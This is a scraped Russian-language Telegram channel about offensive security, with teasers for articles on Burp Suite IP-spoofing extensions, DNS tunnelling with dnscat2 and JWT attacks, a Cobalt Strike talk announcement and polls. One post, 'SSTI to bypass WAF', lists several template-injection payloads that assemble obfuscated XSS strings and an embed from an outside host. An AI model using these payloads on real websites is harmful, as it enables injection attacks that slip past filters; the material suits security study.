RESOLUTE ATTACK

Python for Hacking 4 Часть - Расширение для Burp Suite на Python. IP Changer in HTTP-header

И так , сегодня будет небольшая , но достаточно интересная статья о написание собственного расширения для Burp Suite на Python !

Читать

Please open Telegram to view this post

VIEW IN TELEGRAM

Telegraph

Python for Hacking 4 Часть - Расширение для Burp Suite на Python. IP Changer in HTTP-header

Привет всем ! Сегодня я покажу как работать с Burp Suite , а именно мы напишем постой и в тоже время полезный плагин . Приступим ! Начало... Недавно попался сайт, который блокировал IP посетителя, если тот совершал подозрительные действия. Способ обойти такую…

⚡10👍5🔥1

1.93K views14:27

RESOLUTE ATTACK

Кибербезопасность_стратегии_атак_и_обороны_Юрий_Диогенес,_Эрдаль.pdf

18.7 MB

💻

Кибербезопасность:
стратегии атак и обороны

Безопасность инфраструктуры
с использованием тактик Красной и Синей команд

Очень годное чтиво на ночь 🔥

#Разное #Безопасноcть

Please open Telegram to view this post

VIEW IN TELEGRAM

👍13⚡6🕊4👨‍💻3

4.47K viewsedited 21:48

RESOLUTE ATTACK

SSTI to bypass WAF

Обход WAF с внедрением шаблонов на стороне сервера в тех случаях, когда RCE невозможен

{%set a="<svg oYad=aZt`1`>"%}
{{a|replace({'Y':'nlo','Z':'ler'})|raw}}

{%set a='<svg o'%}
{%set b='nload=al'%}
{%set c='ert`1`>'%}
{{a|raw}}{{b|raw}}{{c|raw}}

{{'<svg o'}}{{'nload=al'}}{{'ert`1`>'}}

{{'<sv%snload=%s%s>'|format('g o','aler','t`1`')|raw}}

{{'>)1(trela=daolno gvs<'|reverse|raw}}

{{'<embe'}}{{'d src=//14.rs>'}}

#Обход

❤5🕊3👍2🔥2

1.99K viewsedited 18:14

RESOLUTE ATTACK

💧

Cobalt strike | Тактика современных угроз

Уже послезавтра!
В 20:00 (мск)

В докладе мы разберём тему:
"Cobalt strike | Тактика современных угроз".

Разберём такие моменты как: Cobalt Strike’s Beacon полезная нагрузка,DNS Beacon,SMB Beacon,TCP Beacon,Фреймворк уклонения Veil,SSH Сессии,Peer-to-peer C2

Спикер - @e7_redteam

Смотри на нашем ютуб канале - тык

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡7❤5🔥3👍2👨‍💻2🕊1

2.06K viewsedited 06:07

RESOLUTE ATTACK

Burp-Suite-Cheat-Sheet.pdf

281.4 KB

🫥

Burp Suite | Cheet Sheet

@E7PENTEST

#Инструменты #Burp_Suite

Please open Telegram to view this post

VIEW IN TELEGRAM

👍8⚡3😈2

2.84K viewsedited 20:42

RESOLUTE ATTACK

Завтра будет ядерная статья 😤

Please open Telegram to view this post

VIEW IN TELEGRAM

😈20⚡7👍4🤩3

1.94K views20:44

RESOLUTE ATTACK

🐍

DNS-туннелирование. Dnscat2.

DNS это базовый протокол, без которого современный интернет даже и вообразить нельзя. Он представляет собой справочники открытой информации из доменных имен хостов и ip адресов.

Упрощенная схема DNS запросов выглядит следующим образом, но реальный DNS трекинг куда сложнее

Читать

#Уязвимости #Инструменты #Сети

Please open Telegram to view this post

VIEW IN TELEGRAM

Telegraph

DNS-туннелирование Dnscat2

DNS вам не друг, не товарищ, а ВРАГ! Заинтриговал? Тогда погнали. Запасаемся терпением. Материал будет долгий, нудный, в некоторых участках вам самим придется разбираться с ОС, чтобы все это заработало. Огромный респект тем, кто осилит, поймет основу и доведет…

⚡9❤6👍3🔥2😈2🕊1

3.52K viewsedited 08:12

RESOLUTE ATTACK

❗️ Та самая, ядерная статья от нашего админа и спеца - @MGMx80

Please open Telegram to view this post

VIEW IN TELEGRAM

1.9K views08:16

RESOLUTE ATTACK

👍

Prototype pollution

На PortSwigger.net добавились новые таски. Они связаны с Prototype pollution. Это уязвимость JavaScript, которая позволяет злоумышленнику добавлять произвольные свойства к глобальным прототипам.

Таски, кроме ручной работы, основаны на использовании DOM Invader (новой утилитой Burp Suite)

EAGER7

#Лаборатории #Уязвимости #Инструменты

Please open Telegram to view this post

VIEW IN TELEGRAM

👍12⚡2👨‍💻2

3.11K viewsedited 14:31

RESOLUTE ATTACK

.: - Покопать ли нам винду?

🫥

Сегодня кстати доклад по Cobalt Strike
Мы создали подобие AD, где будем показывать всё на практике

Please open Telegram to view this post

VIEW IN TELEGRAM

👍16⚡6🔥1

1.95K viewsedited 15:06

RESOLUTE ATTACK

💧

Cobalt strike | Тактика современных угроз

Уже через час!

В докладе мы разберём тему:
"Cobalt strike | Тактика современных угроз".

Разберём такие моменты как: Cobalt Strike’s Beacon полезная нагрузка,DNS Beacon,SMB Beacon,TCP Beacon,Фреймворк уклонения Veil,SSH Сессии,Peer-to-peer C2

Спикер - @e7_redteam

https://www.youtube.com/watch?v=eXlRJtY82Rg

#Инструменты

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥10⚡3👍2🤩2👨‍💻2

3.64K viewsedited 15:51

RESOLUTE ATTACK

Делаем ли мы CTF среди подписчиков?

Anonymous Poll

48%

Да, с разбивкой на команды по 3 человека (полный рандом, но равная сортировка по навыкам)

52%

Нет, сделайте лучше доклад по Metasploit

⚡13🔥5😱2

435 voters4.45K views19:20

RESOLUTE ATTACK

А если в CTF будут денежные призы?)

🔥22👍3👨‍💻3

1.93K views19:26

RESOLUTE ATTACK

Какая же тут битва 🔥

🔥18⚡5🤩2

2.04K views19:33

RESOLUTE ATTACK

0:37

This media is not supported in your browser

VIEW IN TELEGRAM

🦸‍♂️

Немного вам из нашей внутренней кухни

Войс в исполнении E1TEX 🔥😂

Please open Telegram to view this post

VIEW IN TELEGRAM

🕊8❤7🤣7😍3🔥1🤩1

2.16K viewsedited 17:51

RESOLUTE ATTACK

Делать ли E1TEX кавер?

Anonymous Poll

🔥12

113 voters2.08K views18:22

RESOLUTE ATTACK

📯

JWT-Атаки

Привет, Гайз, разбавим немного серию статей про повышение привилегий в ОС Линукс другой тематикой. Сегодня с Вами разберем достаточно известный тип атак на клиентскую часть приложения - JWT-атаки

Читать

#Разное #Привилегии

Please open Telegram to view this post

VIEW IN TELEGRAM

Telegraph

JWT-Атаки

Общие понятия, концепция JWT Привет, Гайз, разбавим немного серию статей про повышение привилегий в ОС Линукс другой тематикой. Сегодня с Вами разберем достаточно известный тип атак на клиентскую часть приложения - JWT-атаки.

🔥9⚡5👍5🕊1

2.31K viewsedited 19:41

RESOLUTE ATTACK

💔

Немного вам материала по сетям

Please open Telegram to view this post

VIEW IN TELEGRAM